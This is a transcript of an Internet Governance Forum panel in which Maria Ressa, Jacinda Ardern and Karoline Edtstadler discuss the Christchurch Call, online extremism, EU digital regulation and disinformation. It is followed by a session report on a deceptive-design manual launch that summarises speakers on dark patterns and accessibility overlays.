And that’s where we’ll go. For the men, I hope you find this inclusive as well. Part of the reason I started this way is because the attacks against women online are literally off the scale. When I talk to reporters who are, in some instances, covering male leaders who are misogynists, their editors tell them, you know, buckle up. It’s not our problem. But I think one of the things that we want to lay out is that it is a problem of the technology, it is an incitement of the technology, and it is knocking women’s voices out of the public debate. Let me bring it back to what exactly we’re talking about, the technology that is shaping our world today. And one of the most interesting things Jacinda Ardern did was a very strong reaction to the live streaming of a terrorist attack. It was the first time that a government literally asked all news organizations around the world to take out the name of the attacker. I was surprised when we got this. But when we thought about it, I was like, oh, well, that kind of makes sense. But also to try to deal with taking down this footage from all around the world. Jacinda, you’ve pointed to the Christchurch Initiative as a multi-stakeholder solution for eliminating terrorist and extremist content online. What did it succeed in doing, and where can you see that moving forward, given the landscape we’re working in today?

Jacinda Ardern:
Thank you. A really big question, but I hope that there are some useful lessons to be learned. Where we’ve succeeded, where we have more work to do. So I assume that a number of people in the room will have a bit of prior knowledge about the Christchurch Call to Action, which is over 150 now strong with member organizations made up of, and supporters made up of the likes of government, civil society, and technology membership and platforms. But taking a step back, why did we create this grouping in the first place? Well, as you say, on the 15th of March in 2019, we experienced a horrific domestic terror attack against our Muslim community. It was live streamed on Facebook for a total of 17 minutes, and then subsequently uploaded a number of times over the following days. It was just prolific. People were encountering it without seeking it. And you’re right to acknowledge that in some cases, it was in people’s feeds. Because it was being reposted by news outlets or referenced by news outlets. Now in the aftermath of that, of course, New Zealanders had a very strong reaction. This should never have been able to happen. But now that it’s happened to us, what can we do to try and prevent it happening again? And we took an approach that was not just about how do we address the fact that live streaming itself became a platform for this horrific attack? Because if we just focused on that, that’s a relatively narrow brief. And we know that the tools that are used for violent extremism or by a violent extremist or terrorist online, they’re going to change. Live streaming was a tool at that time. The response was ill-coordinated by other tech platforms for a number of reasons. So work needed to be done there, yes, but we also wanted to make sure that we were ready and fit for purpose should other new forms of technology be the order of the day for those violent extremists. So the Christchurch Call to Action has a number of objectives. 
Some of them are things like creating a crisis response model so that we are able to stand up quickly should anything like this occur again. And we have not seen anything at the scale and magnitude of Christchurch online since then. And that’s in part because we now have this almost civil defense model. But we also asked, how does someone become radicalized in the first place, acknowledging that in our case the terrorist involved himself acknowledged that he believed he was radicalized by YouTube. Now, you know, people will debate whether or not they believe that to be the case. But regardless, there were questions there to be asked around what we can do as governments within our own societies, but also to better understand these pathways. You know, what is curated? How are curated content and algorithmic outcomes driving particular behavior online? So we’ve got a large piece of work now looking at understanding that better. And these, I think, are areas where our learnings will be hugely beneficial much more broadly.

Maria Ressa:
That’s fantastic. Let me follow up with that, which is, you know, last week, or I guess a week and a half or so ago, I taught a class with Hillary Clinton and the Dean of SIPA, Keren Yarhi-Milo, where we looked at the radicalism that comes with the virulent ideology of terrorism, right? How that radicalizes people. But one of the things we did in the class was to show how similar it is to what we are going through now on a larger scale with political extremism. Are there any lessons from the Christchurch approach and the pillars that you’ve created, how to deal with radicalization, for example, that we can learn to combat the polarization we’re dealing with globally?

Jacinda Ardern:
Good question. And where I come at it from is our starting point was, how did this individual become so radicalized that they were driven to fly to our country, embed themselves in a community, and then plan an attack against our Muslim community and take 51 lives? How is it that that can happen and what can we do to prevent it? And now the learnings from that may be applicable across a range of different areas and a range of different sources of motivation and rationales, whatever they may happen to be presented by the individual. One common denominator that we determined was that, despite the ideology that might be driving the behavior, was that we couldn’t actually answer some of these questions because so often there would be this issue around, well, privacy, intellectual property. It was very hard to get an insight into how, for instance, algorithms might be driving some of this behavior. If indeed it is. And so we took a step back and over time pulled together a group of individuals, as in governments and platforms, who were willing to put funding into creating a privacy-enhancing tool, which will enable researchers to look at the data that we need to look at in order to understand these pathways, and that will enable researchers across a range of fields to better understand that user journey and that curated content, help understand what successful off-ramps look like, and I hope further prevent this kind of radicalization online.

Maria Ressa:
No, that’s a perfect example. And Caroline, you were in the EU, the EU has been ahead, and data being one of the key factors for how we’re able to see the patterns and trends that influence behavior. Could you tell us about the EU’s approach to its democracy action plan, and then now rolling out the Digital Services Act and the Digital Markets Act?

Karoline Edtstadler:
Well, I think at times like this we should do everything in parallel, and there are so many crises and so many challenges we should find an answer for that it is really quite hard to do so. But I really think that the European Union is, regarding the AI Act, ahead. And if I’m saying ahead, I mean we are of course lagging behind, because we should have been quicker. But the developments were so quick in the last two years, I would say, that it is no longer like that. So now we are really trying to do something regarding AI, to have a framework for AI, to have a classification of the risks of AI, and I think that is something very important. To classify the risks, because there are some applications that do not harm us. We need them, I don’t know, for some spam filters; that does not pose a risk. But on the other hand we have AI which is really harming the whole of our society. And this is the one thing. The other thing is that we already have the DSA and the DMA in the European Union, and I can proudly say that we in Austria were pushing that a lot, and we already started a process in 2020 to have a legal framework in Austria. And it was, I would say, now I put it diplomatically, I had a lot of discussions also with the European level, because they were not happy that we wanted to have an Austrian legal framework for that. But they knew that it would take at least two years to create it in the European Union, and we were really quick in Austria. We had the Communications Platform Act in place from the 1st of January 2021, and this is something where the social media platforms have to deal with that issue. They have to do reports, and they had to set up a system where someone who faces hatred on the internet can push a button and say, this is against me, do something, delete it now, because it’s going around the world very quickly, and you as a victim should be helped the minute it comes up. 
So now we have the DSA and the DMA, and of course we have to revise our legislation, but this was also my goal: to have first the national level, then the European, and now I’m here as a member of the leadership panel and really trying to create something universal. So this is for the whole international community, and this is something which is not easy, because of course different governments coming from different standpoints have different assessments of the situation. But in general it’s about human beings, and the need to treat this big danger also to our whole society, as Jacinda said, and as we saw in her country with this really horrifying terrorist attack.

Maria Ressa:
No. From the data from the Philippines that we’ve looked at and analysed, in the Nobel Lecture in 2021 I called social media, the tech companies, behaviour modification systems, and I will tweet the data that shows that, as well as the impact we saw in our society. So let me ask our two leaders. You know, social media was the first time that machine learning and artificial intelligence were really allowed to insidiously manipulate humanity at scale, you’re talking about at that point maybe 3.2 billion people, right, deployed at scale across platforms, because it doesn’t just stay in one. There was a lot of public debate and a lot of lobbying money that was focused around downstream solutions, right? The way I think about it is, you know, there’s a factory of lies, I mean, you would have seen this already, that is spewing lies into our information ecosystem, the river, and what we tend to focus on in the public is content moderation. Content moderation is like taking a glass of water from the river, cleaning it up, and then dumping it back into the river. So, you know, how can we move away from these downstream solutions like content moderation, more into structural problems like design? The fact that MIT in 2018 said lies spread six times faster on these technology platforms than really boring facts. So that design allowed surveillance for profit, right, a business model that we didn’t name until Shoshana Zuboff wrote a book called Surveillance Capitalism in 2019. That just meant that we were retrofitting, we were reacting to the problems after they materialized. Now that we’re in the age of generative AI, I wonder how we can avoid being reactive. Why should the harm come first before we protect the people here? I know it’s a tough question to throw at you, but let me give you an example from the pharmaceutical industry. 
There was a COVID vaccine that we were all looking for. Imagine if the pharmaceutical companies didn’t have to first test it, that they could test it in public. So this group A, I’m going to give you vaccine A, and this group here, I’m going to give you vaccine B. Oh, group A, I’m so sorry, you died. I only say that because it is exactly what happened in Myanmar, for example, where both the UN and Meta sent teams to study genocide in Myanmar. So can we do anything to prevent these types of harms happening? And Caroline first, or Jacinda? Caroline.

Karoline Edtstadler:
Well, I would say the first thing is to raise the awareness, to take it as it is, to raise the awareness and to allow people education and give them skills to deal with that. The second thing, and this is what we are trying to do, we are doing that also in the leadership panel, is to set some legal framework in place. And I would say it should be a regulation that is not hindering innovation, because we know that the developments are quick, they are needed, and they can be used for the best of us. But we have to learn to handle them and also to handle the downsides. And now it’s said very easily, put some legal framework in place, but it’s not so easy, because I’m sure that we will lag behind also in the future. And I sometimes compare that with my former profession as a criminal judge. As a criminal judge you’re sitting in the courtroom, but you never have all the information the perpetrator has. You are always behind, but in the end you have to deal with it, and you can deal with it. And I think that’s the same approach we have to use in regard to new technologies, AI, and all the things coming along. And we already proved that it is possible to do so with the DSA and the DMA, and before that with the legal framework we put in place in Austria. Because, maybe two more sentences on that: when I started the process in 2020, and when I invited the social media platforms to get into a dialogue with me about hatred on the internet and what we can do against it, and said that we wanted to put up a legal framework from the parliamentarian side, because we as democracies are represented by the parliamentarians and we are ruled by governments, they said, oh no, you don’t have to do that, because we are so good at handling the hatred on the internet. We are deleting all the hate postings and so on. We don’t need a legal framework from the national state or from, I don’t know, the EU. And now we have it. And now I think almost all of them are quite okay with it. 
Let’s put it like that. And we are now in a process, also here in Tokyo, as we were in Addis Ababa, of getting into an exchange, exchanging our experiences and also the expectations of society, and this is a good development.

Maria Ressa:
Fantastic. Jacinda, your thoughts? Upstream solutions for generative AI.

Jacinda Ardern:
And look, I think that sentiment that you shared in instigating this part of the conversation, around how we put in place guardrails before the fact, has to be, I think, one of our key take-homes over the last, you know, ten years or more. And I think we’re naturally seeing a hesitancy or a scepticism in the public as a result of the fact that we’ve been retrofitting solutions to try and prevent harms after the fact. Pew released some research, I believe it was recently, demonstrating that roughly half of people were quite negative about the relative benefits of AI, and those who know more are even more negative. Now, in part that will be because we are talking so much about the potential harms and there isn’t that same emphasis on the opportunities that exist. But I also think it speaks to the experience in recent times of the public, and the fact that it’s relatively rare to have a field of work where just because you can, you do. As in, we have the ability to develop this tech, and so we push ahead even though there are those who are flagging risks and flagging harm. I’m an optimist, though, and I think what I find really encouraging is that we are having these open conversations around the concerns that exist, and included in those conversations are those who are at the forefront of the tech itself. And this is where I come back to the fact that I, as a past regulator, am not in the best position to tell you precisely the prescription for those guardrails. But I can tell you, in my experience, the best methodology for developing them. And that, in my mind, will always be, in this fast-paced environment, not to solely take a regulatory approach, although it’s an incredibly important part of the mix, because of the rapid pace at which we see these technologies developed. 
And given the multiple, I think, intersections and perspectives we need at the table, a multi-stakeholder approach that includes companies, government and civil society is incredibly important. And, you know, in my mind, even if I can’t give you the prescription, I absolutely believe that will be the how. One other thing I did not anticipate when we set up the Christchurch Call to Action, and when we convened a group of that nature, was the fact that the companies themselves created a natural tension amongst themselves. Those who were willing to do the least were pulled up by those who were willing to do the most. There was full exposure over, you know, those issues where they might have said previously, in a one-on-one, that’s not possible. You got tension there, where others knew that it wasn’t possible just to speak to a regulator as though they were unfamiliar with the tech or with the parameters they were operating within, because they were in a room with those who did understand. And I think that’s particularly important in an area where this is so fast-paced and highly technical. We need that tension, I think, in the room as well. The final thing I’d say is there are opportunities here. AI may well help us in some areas where we have previously struggled with some of those existing issues that might have been spoken to around content moderation, social media, and so on. And naturally, so many of these things just collide in these conversations. And so we should keep looking for those opportunities. But I, for one, always want to take a risk-based approach. And I’ll always look for the guardrails.

Maria Ressa:
Fantastic. So I’m going to ask one more question, and then if you have questions, please just go to the microphones. We’re coming up on the last 20 minutes. So this last one: we’ve tackled the first contact with AI, and we’ve looked at generative AI. And yes, there’s the EU’s doctrine on AI; lots of doctrines have been pushed out already. But let’s talk about the use of AI in law enforcement and surveillance, and the concerns that have been raised about civil liberties and privacy. What guardrails can we put in place to protect human rights? And I’m going to toss that first to Jacinda.

Jacinda Ardern:
Yeah, this is where we should not be starting from scratch. You know, liberal democracies should pull from the toolkit of human rights and privacy; these are well-established rules and norms. Now, if indeed there is any nuance in that discussion for any particular area, and often it should be relatively black and white, but if there is any nuance in the discussion, that is where civil society, in my mind, has to be at the table. And again, you know, not to harp on about the importance of the multi-stakeholder approach, but let's first and foremost not forget that we have well-established human rights practices and privacy laws, and this should be our fallback position. Any question mark over that, and civil society alongside government should be really a good pressure point in those conversations.

Maria Ressa:
And this is where I would encourage civil society to come up stronger. We must, because of the use of Pegasus and Predator, and the increasing conflicts all around us. Caroline, the same question to you: what guardrails can we also put in place?

Karoline Edtstadler:
Well, I fully second what Jacinda said. I don't think we have to reinvent the wheel. There is already a human rights-based order in the world, even if we see, especially since February last year, that some are really disobeying everything we concluded to follow. But coming back to the internet and technology side, I think we have to guarantee a rules-based approach in this regard. And I also fully second that AI and all the other technologies can be used, and are already used, for the best of all of us. Think of medicine: they are used for operations and can do them much more precisely than a human ever could, and this helps us, of course. And also in law enforcement, which you asked about. I recently heard a presentation in Austria before lawyers and barristers, and we were told that in the future, of course, law firms will use AI to find judgments and to structure knowledge more quickly. But the question is, to what point will we go? Will there, in the end, be not a judge but some technology sitting and deciding whether someone has to be sent to prison or not? So this is really where we should draw a line. And this is what we are trying to do within the European Union with the AI Act: to structure the risks of AI. And I really do think that this is the way we can guarantee that these technologies are used for the best of all of us. And of course we also have to be clear that there is always a downside. But let's handle these downsides, and then it's better for all of us.

Maria Ressa:
Great. Annie, the mic is open for any questions from the audience. Yes, please. Do I have it? Okay. Say your name and then to whom you want to throw the question.

Audience:
I'm Larry Magid, and I'm the CEO of ConnectSafely. And I guess I'm here for some advice, because we are writing a parents' and educators' guide to generative AI. And we've got a journalist here, and we've got a couple of politicians who are really good at talking to the general public. So how would you address parents, educators, people who don't have a technical knowledge of what generative AI is? To reassure them that it's probably not the end of the world, at least initially, but also to warn them that there are significant risks, and to focus a little bit on what they can do within their own families and classrooms to mitigate the risks for the kids and themselves. Thank you.

Maria Ressa:
Caroline, you want to take it?

Karoline Edtstadler:
Well, I think it's true. The reality is sometimes that children are explaining to parents how to use the phone, or they are not doing so and are simply using their phones to do things the parents didn't want them to do. So I think it's also something we as governments have to try to address through legislation or, let's say, information campaigns, to get the knowledge and the skills to the people. And this is of course a big, big challenge, because we also have to train older people, because they use these things, but there is again always a downside to it. And this is something we can only do together. We had some campaigns in Austria and some trainings for older people, and we had a lot of discussions on how to train parents. And I don't have the answer for how to do it, but I think the way forward is to exchange our experiences across different countries: what works and how it can work.

Maria Ressa:
Great, thank you.

Jacinda Ardern:
This is such a good question. You know, I was in the generation that sat at that really interesting transition point where, you know, we went from being students who were taught how to use the Dewey Decimal System to find a book in a library, and once you'd figured out how to find a book in a library, you had found your fact and your resource. To then being in a period where we were, of course, inundated with the ability to seek information at our fingertips, but we weren't really taught, I think, as successfully that what we then found on that shelf might not necessarily be the fact we thought we were finding before. I had a history teacher who was extremely influential for me growing up, and who described it as going from a hose to a fire hydrant for kids. So regardless of the particular tech at any given time, be it generative AI or whatever else we may encounter in the future, I would hope that we teach our kids to be curious. Not cynical, but curious. And now the tools that we have may be giving the impression that we're going from a fire hydrant back down to a really well-refined hose, but that water has been derived from a particular source in a particular way, and we need to teach kids to be curious about that. To go back not just to the information in front of you, but to think a couple of layers back, and to think critically a couple of layers back. So I would sum it up with just curiosity in everything. I think that is going to help us with the age of disinformation and with rapid technological change, and I hope it will create a generation that is not cynical as a result.

Maria Ressa:
Fantastic.

Audience:
Hi, good morning. My name is Michael. I'm the Executive Director of the Forum on Information and Democracy. It's very intimidating to be in front of greatness, but I'll try to ask a good question. One of the themes I've heard today, and yesterday in fact, is the importance of a multi-stakeholder approach to finding solutions, and my question is specifically around the participation of civil society. It's very easy for governments to show up. It's very easy for companies to show up, particularly in an environment where pay-to-play is so pervasive, where you pay a few hundred thousand dollars and your CEO can show up and speak at an event, you can host a session on a panel, you can capture the narrative. It's not so easy for civil society. You can't just buy a business-class ticket, get on a plane the next day and show up at an event. So if we're going to really advance a multi-stakeholder approach, what are some solutions to ensure civil society, especially those from the Global South, can participate effectively?

Maria Ressa:
I like the Global South. Let's, yeah.

Karoline Edtstadler:
Well, I can only say we really try to include civil society, and I think the understanding is there that we can tackle these problems and issues only together. Not the government alone, not the parliamentarians alone, not civil society, not the tech enterprises, but only we as a society together, and I really mean all of us, including the government. And we are doing that in Austria. I'll give you an example from the implementation of the SDGs: I will go back on Wednesday and we'll have the third dialogue forum on the SDGs, where we really invite civil society to contribute, to tell us what they are doing. And this is the same here. You can't do it top-down. You can only do it together.

Jacinda Ardern:
You'd be a really good person to speak to this yourself, so maybe you should have a punt at the question. My very brief contribution would be that, Michael, I totally agree with you. Early on in the Call, you know, most of my interactions were with civil society at the table, because that was what we were building: we wanted it to be a structure where civil society were at the table. As you say, there are some real practical things to overcome in creating a network of that nature. And they may well be in the room, I can't see the room, but if anyone from our Christchurch Call network is there, I'd ask them to give a quick raise of their hand and to share, at some point, whenever it's appropriate, their experience. We certainly have learned as we've gone over the last four years about how we can make that engagement easier at a practical level, and meaningful. But the fact we are still going, and I think it is still seen as a valuable network, I hope means we're doing some things right, while also learning as we go, because we're not perfect. But I'd hand back to you, dear moderator.

Maria Ressa:
Thanks, Jacinda. I mean, Michael, you know there are these times when civil society comes together. We have the Paris Peace Forum coming up. Over the last few years, that's been one way that we've been able to get civil society together, but frankly, not enough, I think. And there are many different groups; Tallinn in Estonia has just handed over the Open Government Partnership to Kenya, right? There are all these different groups that are working together, some of them on past problems that could evolve to take on the… you know, I'm a journalist, so information is power, and that is, to me, the top problem. If we do not solve the corruption of the information ecosystem, we cannot solve anything, let alone climate change, right? Let me throw it open; let's take three questions, and then our leaders can answer. Please.

Audience:
Good morning, Svetlana Zenz, Article 19. I work in a program which engages civil society in talking to the tech sector. My main countries are China, Vietnam, and Myanmar. So the question is the following. All the European initiatives regarding controlling and, let's say, monitoring the private sector, especially the ICT sector, working in European territories are great, and of course human rights-centric. Some of the CSOs in Europe might not agree with me, but in comparison with Myanmar, for instance, they are very good points to follow. So my question is: for all the private sector which is regulated in Europe, especially under the Digital Act or Digital EA Act, how would you monitor their actions in countries with totalitarian regimes? Great. Go ahead, please. Hi, yeah, I'm Viet Vu from the Dais at Toronto Metropolitan University. Maria, we had you in March at our Democracy Exchange, on democracy in power, and so my question is related to that. How do you square the fact that many of the people most susceptible to misinformation and disinformation are the kind of people who lack fundamental trust in structures and institutions? I'm sure there are strange conspiracies about what we're doing in this room today. How do you reach those people? Great, lack of trust. And we'll take one more. Yes, and I hope it's not too big a question, but we are being told as humanity that privacy and safety cannot coexist in the online world. We are being told that because the technology is the way it is, and because of the design choices that currently exist, privacy cannot be absolute if there is any consideration of safety, and safety cannot be guaranteed to anybody because we have to really care about privacy.
My question to you is: how can we take a step back, think about human rights and start from there, and then think about design choices, instead of ending up, to be honest, in very stupid debates about little technology choices, the little technology bits and pieces that we need to work on to overcome challenges and get to the place where we can have both? We really need your help as thought leaders, so any thoughts about that would be really welcome.

Maria Ressa:
Fantastic. Let me toss it, Jacinda, you first, Caroline, and then I’ll pick up some of the questions too.

Jacinda Ardern:
Yeah, I'll take maybe the last two; I'll leave the first one to others. Starting on that last one, around the safety debate and the privacy debate: I shared very briefly one experience we had with that, but it persisted for years, because, as I said, with the Christchurch Call, for instance, we didn't want to just look downstream, we wanted to go upstream. We wanted to look at those things that may be contributing to radicalization. Algorithmic outcomes kept coming up, and privacy then kept coming up. Well, we've now demonstrated, with the establishment of this tool, that you can overcome that debate. It did take some resource to establish it, but the Christchurch Call Initiative on Algorithmic Outcomes now has researchers accessing, in real time, information that we were previously told, for privacy reasons, we would not be able to get to. Now, the next step for us will be demonstrating that that research can prove valuable, and then saying to the social media companies, well, this is what we're learning now, what are we going to do about it? That, I think, will be the critical next step. But the learning for me there is that there are ways. It took too long, though; that was four years that it took us to really overcome that issue. But I hope that gives some encouragement that we are pushing past it. And sometimes that creative tension I talked about, in the room with other tech companies, is really helpful for those debates. The second issue: you're hitting the nail on the head. What do we do about those who are susceptible to disinformation? You know, we've seen what it can do to liberal democracies when that is writ large. We've had some very recent examples in a number of countries, and it is devastating. Here I track back again.
Now, there are those who are doing research on this, I believe, particularly the likes of Columbia, who are tracking back to look at the common themes we're seeing in those who are most susceptible. But instinct will probably tell us quite a lot as well. If you've got an inherent distrust of the state, probably at some point the state has failed you in some form. Now, that's a generalization. But if there's a general view that your economic position in life is influenced by the state, and you're in a lower socioeconomic category and disenfranchised, or you've had an experience with the state, for instance where at some point you've been in its care, these are some of the features that we see, and of course educational attainment as well. Now, we as governments need to track back and think about what we can do to reestablish that trust in institutions. And that means actually delivering for our people as they expect us to. It's as simple as that. When it comes down to the one-on-one, I've tried to have conversations with people who are deep in conspiracy, and it is an incredibly demoralizing experience. That's why I always go back to the beginning: how do we stop people falling in in the first place?

Maria Ressa:
Caroline?

Karoline Edtstadler:
Well, I would like to start with the second question, because I think that's the main question for us as politicians: how can we regain trust in institutions, in governments, in democracy as such? I would say this is also the most difficult question to answer. We are living in challenging times, as has been mentioned several times already, and people are tired of crises and want to believe in easy solutions. And this is really our problem, but democracy is hard work every day, and we have to fight for the trust of the people on a daily basis. So this is the only thing we can do, and we all have to be aware of the fact that you normally cannot find a solution which is beloved by everyone. So there will always be a certain group of people, call it what you will, who are not happy with the decision. But democracy means that we find majorities, and this is something which was clear in the past, and now it's not so clear. And one of the reasons, and this also goes to the first question, is that you can find misinformation and disinformation on the internet, and that you find your group only echoing your own opinion. And this is really something we found out, especially during the COVID pandemic: that it is nearly impossible to get people out of such echo chambers if they are settled in their opinions and surrounded by people who share them. So what we try to do is to regulate things in Europe, and we would like to be a role model for the world. That's why I'm very happy that I'm part of the leadership panel and that I can contribute from my experiences in Austria, but also at the European level. And again, we are not at the end of this story. And regarding the third point, privacy versus safety: I think we need both of them. It's always a challenge, and it has always been a challenge, to guarantee human rights.
You always have the situation that the human right of one person ends where the human right of another person is infringed. And this is something we have to balance on a daily basis, and it is what I did as a criminal judge in the courtroom every day. If someone wants to demonstrate, he can, of course, do that. But this right ends when the body of, I don't know, another person or a policeman is injured. Here too you have to find the balance, and this is what we have to do. So I would not be as pessimistic as the person, I think it was a woman, who put the question to me: we can do both. We have to do both.

Maria Ressa:
Jacinda has a hard stop at the top of the hour, so let me quickly answer, and then I want to ask Jacinda for her last thoughts before we let you go. So, the quick answer to the first question, the weakness of institutions in the Global South: the countries that you mentioned are the countries where we have seen the regression of democracy, right? And yes, in countries with authoritarian leaders, most of the time they are using this technology to retain and to gain more power. How do we deal with that? We can talk about that more after the panel. The second one, the cognitive bias that you mentioned: it is there, but frankly, smart people think that they're immune from the behavior-modification aspects of information warfare or information operations. We are all susceptible, and sometimes the smarter you are, the harder you fall, right? This is a problem. I think it's a problem for leaders. It is a problem for our shared reality. This is the reason why I have spoken out a lot more about the dangers, because without a shared reality, we cannot do anything together. Finally, the last one: oh my God, I love your question, because privacy by design, and trust and safety by design, are possible. When the tech companies say that they cannot, it just means they won't, because there is no regulation, no law, no civil society pressure to demand it. We deserve better. Let me throw it back to Jacinda Ardern for her closing thoughts.

Jacinda Ardern:
Oh, look, I think that you’ve traversed a set of issues that are confronting, I think, all of us in different ways and cut across a range of other incredibly serious and important issues. How do you tackle climate change unless you have a shared reality around the problem definition? The degree to which we see information integrity issues playing out in geo-strategic issues, the fact that they’re coupled with what would be considered traditional forms of warfare. There is a poly-crisis, and at every level of that poly-crisis, we see this extra layer of the challenges presented by technological developments that we’ve seen in recent times. But I’m an optimist, and I’m an optimist because in the worst of times, I’ve been exposed to the ability of humans to design solutions and rapidly adapt and implement solutions, ultimately, for the most part, to protect humanity. And we have that within our capability. We need to empower those who are specifically focused on doing that, who are dedicating themselves to it, often at great sacrifice. We need to support regulators who are focused on doing that, and we need to continue to just rally one another in what is an incredibly difficult space. So my final note to those in the room who are working in these areas, I acknowledge you and the work you do. It is incredibly tough going, but you are in the right place at the right time, and your grandchildren will thank you for it.

Maria Ressa:
Thank you. Thank you, Jacinda Ardern. Caroline, your thoughts?

Karoline Edtstadler:
Well, I can only second what Jacinda said. Your grandchildren will thank you one day, because now is the time to create the future, and these challenging and crucial times need all of us. And I'm coming back to what I already said: we cannot do it alone as governments, we cannot leave it to the tech enterprises, we cannot do it as politicians, no matter where you serve. We need all of us. We need society to be aware of the challenges ahead, and to stay optimistic. I really would like to conclude with: stay optimistic. Thinking back and learning from history, it normally took about 100 years to get used to a new technology. And we are talking about the internet, and we have the father of the internet serving as our chair of the leadership panel, and he invented the internet about 50 years ago. So we are halfway. It's the right time to set the legislation for the internet. It's the right time to make children, parents and grandparents aware of how and what to do with the internet and all these applications we already use in our daily lives, and to see the positive things, how we have changed our lives for the better since we have had all these technologies in our daily lives. So this is really what I try to do. I'm really proud to have the opportunity to contribute at this level, but that doesn't mean it is more important than other levels; the contrary is the case. Everyone is needed in this process, and we can only do it together.

Maria Ressa:
Fantastic. And the last thing I would say is: everyone in this room, you are here for the Internet Governance Forum. It is a pivotal moment, and our panelists are so wonderfully optimistic. I'm probably a little more pessimistic, but it depends on what you do, right? It comes down to all of us, and I hate to say it that way, but it is this moment in time. Thank you so much, Right Honorable Jacinda Ardern, Minister Edtstadler, and you guys in the room. We move to the main session. Thank you for coming, and let's move.

Audience

Speech speed

192 words per minute

Speech length

783 words

Speech time

244 secs

Jacinda Ardern

Speech speed

182 words per minute

Speech length

3161 words

Speech time

1043 secs

Karoline Edtstadler

Speech speed

177 words per minute

Speech length

2948 words

Speech time

999 secs

Maria Ressa

Speech speed

166 words per minute

Speech length

1750 words

Speech time

634 secs

Design Beyond Deception: A Manual for Design Practitioners | IGF 2023 Launch / Award Event #169


Full session report

Cristiana Santos

The analysis focused on discussions around different aspects of e-commerce, deceptive design, dark patterns, and regulation. One of the speakers, Chandni Gupta, conducted research that had a positive influence on regulators, leading to the implementation of easier subscription and unsubscription processes on platforms like Amazon. This highlights the importance of academic research in shaping policies and improving user experience in e-commerce.

Cristiana Santos brought attention to deceptive design practices from a legal standpoint. She discussed how the risk of sanctions can serve as a deterrent for organizations engaging in such practices. Additionally, she emphasized the significance of naming and shaming these practices to create accountability and discourage their use. This legal perspective sheds light on the potential consequences and strategies for tackling deceptive design in the industry.

The analysis also delved into the prevalence of dark patterns, not only within big tech companies but also in smaller, public organizations. Dark patterns refer to manipulative design tactics that make it difficult for users to refuse or withdraw consent. The negative sentiment surrounding dark patterns was evident, as they were found to have harmful effects on users. Studies have shown that dark patterns can cause cognitive harm, result in the loss of control over personal data, evoke negative emotional responses, and create regret over privacy choices. This highlights the need to address and mitigate the adverse impact of dark patterns on individuals’ well-being.

Furthermore, there was a call for better regulation and a shared vocabulary surrounding dark patterns. The speaker, Cristiana Santos, suggested that a shared understanding of dark patterns would greatly benefit user studies, decision mapping, and harm assessments. It is essential for regulatory bodies and scholars to align in their understanding of dark patterns to effectively regulate and combat their negative consequences. This emphasizes the importance of collaboration and knowledge exchange among key stakeholders to address the challenges posed by dark patterns.

In conclusion, this analysis explored important topics related to e-commerce, deceptive design, dark patterns, and regulation. It highlighted the influence of research on policy-making, the legal standpoint on deceptive design practices, the prevalence and harmful effects of dark patterns, and the need for better regulation and a shared vocabulary to address these issues effectively. This comprehensive examination provides valuable insights into the complexities surrounding user experience and the imperative for responsible technological practices in the digital landscape.

Titiksha Vashist

The analysis explores the issue of deceptive design and its negative impact on users and digital ecosystems. One aspect that is discussed is the existence of dark patterns in various online experiences, such as e-commerce apps, social media, and fintech services. These dark patterns are intentionally designed to deceive or manipulate users, ultimately influencing their decision-making. This can lead users to make choices that they would not have made if not for the deceptive design.

Another significant point raised is the harmful consequences of deceptive design on individuals and digital ecosystems as a whole. Deceptive design can result in privacy violations, financial losses, psychological harm, and wasted time and resources. These consequences not only affect individuals but also have broader implications for the integrity and functioning of digital ecosystems.

The analysis also highlights the “Design Beyond Deception” project, which spanned 18 months and involved global expert consultations, workshops, and a research series. The primary goal of this project was to gain a better understanding of how deceptive design impacts contexts that have received less attention in previous research. By shedding light on these understudied areas, the project aims to contribute to the overall understanding of the harmful effects of deceptive design.

Additionally, the analysis underscores the role of regulatory bodies in addressing deceptive design practices. The US Federal Trade Commission and the European Commission have been actively investigating deceptive practices in their respective jurisdictions. This global attention demonstrates the recognition of the need to combat deceptive design and protect users from its negative impact.

In conclusion, the analysis emphasizes that deceptive design has grave consequences and calls for global investigation and action. Its negative effects extend to both individual users and the wider digital ecosystem. Deceptive design distorts fair competition and leads to unfair trade practices. Therefore, it is crucial to address deceptive design in order to safeguard the integrity and well-being of users and digital systems.

Caroline Sinders

Harmful design patterns present a significant challenge on a global scale, particularly within the realm of the modern web. These patterns are characterized by their deceptive and manipulative nature, subverting users’ expectations. They are prevalent universally across various websites and digital platforms.

These harmful design patterns create an unequal web, where users with a design background or knowledge of user experience (UX) design are more equipped to recognize and avoid them. This knowledge gap creates a disparity between users who can navigate the web safely and those who lack this understanding.

Addressing and investigating these harmful design patterns requires a comprehensive understanding of the expected design patterns and where deception or manipulation occurs. This highlights the importance of interdisciplinary research, bringing together policymakers, regulators, and designers. The collaboration of these different areas of expertise can lead to more effective strategies to combat and mitigate the negative effects of these design patterns.

Caroline Sinders, a passionate advocate, emphasizes the need for extensive research that encompasses technical, design, and policy perspectives. Understanding the entire process of product development, including manufacturing and testing, is essential for thorough analysis of the interface. This comprehensive approach strengthens the ability to identify and address deceptive design patterns, ensuring a more user-friendly and trustworthy digital landscape.

In summary, harmful design patterns pose a global issue within the modern web, deceiving and manipulating users and compromising their online experiences. The resulting unequal web underscores the importance of interdisciplinary collaboration to address these patterns. Policymakers, regulators, and designers must work together to develop effective strategies and solutions. Extensive research, incorporating technical, design, and policy perspectives, is necessary to understand and combat deceptive design patterns, ultimately creating a more secure and user-centric digital environment.

Maitreya Shah

Deceptive design practices, particularly in accessibility overlay tools, have detrimental effects on individuals with disabilities. These tools make superficial changes to the user interface, giving the illusion of accessibility without addressing the source code. Consequently, people with disabilities are deceived into perceiving websites as accessible, when in reality, they may still encounter barriers. This not only undermines their ability to navigate and interact with online content but also hinders their equal participation in society.

One concerning aspect is that accessibility overlays can obstruct assistive technologies, which are essential for individuals with disabilities to access and interact with digital content. By impeding these technologies, accessibility overlays violate the privacy and independence of people with disabilities, making it challenging for them to fully engage with online platforms.

Furthermore, companies that use accessibility overlay tools are potentially disregarding their moral and legal obligation to create genuinely accessible websites. By relying on these tools, they sidestep the necessary steps to ensure that their digital content is inclusive, effectively excluding individuals with disabilities from participating in online activities.

A related issue is the possibility of users with disabilities being coerced into making unwanted purchases as a result of these deceptive design practices. When accessibility overlays create a false sense of accessibility, users may unknowingly engage in transactions that are not aligned with their preferences or needs. This highlights the harmful consequences of deceptive designs and the ethical responsibilities that businesses should uphold.

